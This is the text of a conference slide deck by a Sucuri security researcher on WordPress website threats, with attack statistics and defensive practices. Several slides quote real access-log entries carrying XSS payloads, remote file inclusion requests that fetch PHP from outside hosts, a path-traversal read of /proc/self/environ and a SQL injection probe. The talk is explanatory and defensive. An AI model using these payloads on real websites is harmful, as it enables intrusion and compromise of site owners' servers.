Trends, Threats, Defenses
WordPress Website Security
04/11/2023
root@wcmia # WHOIS PEREZBOX
Expertise: None
Specialization: Website Security Incident Handling Log Analysis
Special Interests: Warfare Weapons Martial Arts
Tony Perez | @perezbox | @sucuri_security | #WCMIA 2
04/11/2023
Website Security Company
Global Operations
All Website Platforms
Scan 1M Unique Domains a Month
Block 1M web attacks a Month
300 – 500 websites a day
Signature / Heuristic Based
24/5 - 18/2 operations
Tony Perez | @perezbox | @sucuri_security | #WCMIA 3
04/11/2023
Today’s Discussion
Trends Threats Defenses
Tony Perez | @perezbox | @sucuri_security | #WCMIA 4
SIMPLE RIGHT?
04/11/2023
Trends
Tony Perez | @perezbox | @sucuri_security | #WCMIA 5
04/11/2023
Explosion in Web Malicious Links
Tony Perez | @perezbox | @sucuri_security | #WCMIA 6
Malicious Links
20112012
600%
04/11/2023
Malicious Links?
Tony Perez | @perezbox | @sucuri_security | #WCMIA 7
Malicious
Links
Social Media
Email Links
Website
04/11/2023
The Web Is The Source
Known MalwareUnkown Malware
Tony Perez | @perezbox | @sucuri_security | #WCMIA 8
90%
04/11/2023
What’s a Good Host?
Not InfectedInfected
Tony Perez | @perezbox | @sucuri_security | #WCMIA 9
85%
04/11/2023
Malware Type Distribution
Remot
e iF
ram
e In
cludes
Remot
e Ja
vaScr
ipt In
cludes
SPAM In
ject
ions
Obfu
scat
ed /
Enco
ded Ja
vaScr
ipt
Condit
ional
Red
irec
ts
Def
acem
ents
Oth
er
26%
19%16%
14%11%
4%
10%
Tony Perez | @perezbox | @sucuri_security | #WCMIA 10
9 Million Unique Domains Scanned
-19 % Infected
04/11/2023
Moving Beyond WordPress
Tony Perez | @perezbox | @sucuri_security | #WCMIA 11
Apache
SSH Email Server
Going Deeper than the application layer, targeting the server.
Server Polymorphism – a.k.a changes a lot
04/11/2023
Exploiting Forms
Stick With Reputable Sources
Gravity Forms
JetPack Forms
Generating SPAM emails, resource hogs
IP blacklistingTony Perez | @perezbox | @sucuri_security | #WCMIA 12
04/11/2023
Spear Phishing Rise
Tony Perez | @perezbox | @sucuri_security | #WCMIA 13
04/11/2023
Search Engine Poisoning (SEP)
Pharmacy Payday Loans
Tony Perez | @perezbox | @sucuri_security | #WCMIA 14
04/11/2023
Automated Attacks
WP-Admin
Theme / Plugin Editor
Payload
Tony Perez | @perezbox | @sucuri_security | #WCMIA 15
Access – so easy, yet so weak Widgets too…
04/11/2023
Cross-Site Contamination
Tony Perez | @perezbox | @sucuri_security | #WCMIA 16
Site 1
Site 2Site 3
Site 4
04/11/2023
iFrame Injections
Tony Perez | @perezbox | @sucuri_security | #WCMIA 17
04/11/2023
Drive By Downloads
Tony Perez | @perezbox | @sucuri_security | #WCMIA 18
04/11/2023
Targeting Java Zero Days
Tony Perez | @perezbox | @sucuri_security | #WCMIA 19
04/11/2023
Targeting Mobile Devices
Tony Perez | @perezbox | @sucuri_security | #WCMIA 20
04/11/2023
Google is On Fire
Tony Perez | @perezbox | @sucuri_security | #WCMIA 21
04/11/2023
There’s a Tool for that
Explosion in the Malware as a Service (MaaS) trade Yes, pay someone to hack
for you
Different tools to break in and generate payloads Brute force and
vulnerability exploits Malware Payloads
Blackhole Exploit Kit – Today’s market leader 2013 – SophoLabs
Tony Perez | @perezbox | @sucuri_security | #WCMIA 22
04/11/2023
Don’t Worry, Everyone is a Target
Tony Perez | @perezbox | @sucuri_security | #WCMIA 23
04/11/2023 Tony Perez | @perezbox | @sucuri_security | #WCMIA 24
04/11/2023
Threats
Tony Perez | @perezbox | @sucuri_security | #WCMIA 25
04/11/2023
Anatomy of Web Attacks
Recon Identify Attack Decisions Sustain
Tony Perez | @perezbox | @sucuri_security | #WCMIA 26
Use for malware? Burrow into network? Steal data?
What kind of website do you have?
04/11/2023
Cross-Site Scripting (XSS)
Tony Perez | @perezbox | @sucuri_security | #WCMIA 27
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
Stored Reflective
04/11/2023
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0”
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6”
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
Remote / Local File Inclusion (RFI)
Tony Perez | @perezbox | @sucuri_security | #WCMIA 28
04/11/2023
SQL Injection
Tony Perez | @perezbox | @sucuri_security | #WCMIA 29
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”
04/11/2023
Spear Phishing
Tony Perez | @perezbox | @sucuri_security | #WCMIA 30
04/11/2023
Backdoors
Tony Perez | @perezbox | @sucuri_security | #WCMIA 31
04/11/2023
What’s all this mean?
Brand Reputation Legal Implications Impact to Sales Blacklisted by
Search Engines Blacklisted by
Payment processors Worst Day Of your
Life
Tony Perez | @perezbox | @sucuri_security | #WCMIA 32
04/11/2023 Tony Perez | @perezbox | @sucuri_security | #WCMIA 33
04/11/2023
Defenses
Tony Perez | @perezbox | @sucuri_security | #WCMIA 34
04/11/2023
Areas to Focus On
Access Control Vulnerabilities Hosting Online Habits Social Media Passwords
Tony Perez | @perezbox | @sucuri_security | #WCMIA 35
04/11/2023
Manage our own expectations
“It’s about risk reduction… risk will never be zero…”
Tony Perez | @perezbox | @sucuri_security | #WCMIA 36
04/11/2023
The Foundation
We run on WordPress Current Version of course
Sucuri properties suffer: ~125,000 web based
attacks a month on average
~4,000 attacks a day▪ This spikes on occasion
Doesn’t include server level attacks
All flavors of attacks
Tony Perez | @perezbox | @sucuri_security | #WCMIA 37
04/11/2023
Defense in Depth Approach Instead of telling you what you need to do,
I’ll just tell you what we do;
Our philosophy and approach is very simple, complex things break in complex ways;
We focus on the areas that we can immediately control;
We believe in layered defenses;Tony Perez | @perezbox | @sucuri_security | #WCMIA 38
04/11/2023
What we do…for web Access
Tony Perez | @perezbox | @sucuri_security | #WCMIA 39
IP Whitelisting
Two Factor Authentication
Strong / Unique Password
Web Application Firewall
Log Everything
04/11/2023
What we do…for Vulnerabilities
Tony Perez | @perezbox | @sucuri_security | #WCMIA 40
Stay Current
Use Trusted Sources
Avoid Soup Kitchen Servers
Web Application Firewall
Log Everything
04/11/2023
What we do…for Servers
Tony Perez | @perezbox | @sucuri_security | #WCMIA 41
IP Whitelisting
Server Isolation
Public Key Authentication
Host Intrusion Detection System (HIDS)
Log Everything
04/11/2023
My Personal Configurations.. Tools..
Category Tool Type
Prevention – Software Vulnerabilities Sucuri CloudProxy Service
Prevention – Access Control Sucuri CloudProxy Service
Detection Sucuri Monitoring Service
Remediation Sucuri Service
Password Management 1Password / LastPass Application
Host-based Intrusion Detection System
OSSEC Application
Access Control Enforcement Login Secure Solutions
Plugin
Two-Factor Authentication Google Authenticator Plugin
Application Auditing Sucuri Premium Plugin
Backups VaultPress Plugin
Tony Perez | @perezbox | @sucuri_security | #WCMIA 42
04/11/2023
My Personal Configurations… cntd..
Tony Perez | @perezbox | @sucuri_security | #WCMIA 43
Category Location Type
Disable Theme / Plugin Editor
wp-config.php Preventive measure
Disable PHP execution .htacces – uploads / images / wp-includes / etc..
Preventive measure
Permissions Directories 755 / Files 644
Preventive measure
04/11/2023
Notable Resources
Tony Perez | @perezbox | @sucuri_security | #WCMIA 44
Name Tool
Sucuri Blog http://blog.sucuri.net
Sucuri TV http://sucuri.tv
WordPress Forum – Hacked http://wordpress.org/tags/hacked
WordPress Forum – Malware http://wordpress.org/tags/malware
Badware Busters https://badwarebusters.org
Perishable Press http://perishablepress.com/category/web-design/security/
Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
WordPress.org Hardening http://codex.wordpress.org/Hardening_WordPress
Google Webmaster Tools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
Secunia Security Advisories http://secunia.com/community/advisories/search/?search=wordpress
Exploit-DB http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
04/11/2023
Questions?
Tony Perez | @perezbox | @sucuri_security | #WCMIA 45
04/11/2023
Thanks
Tony Perez | @perezbox | @sucuri_security | #WCMIA 46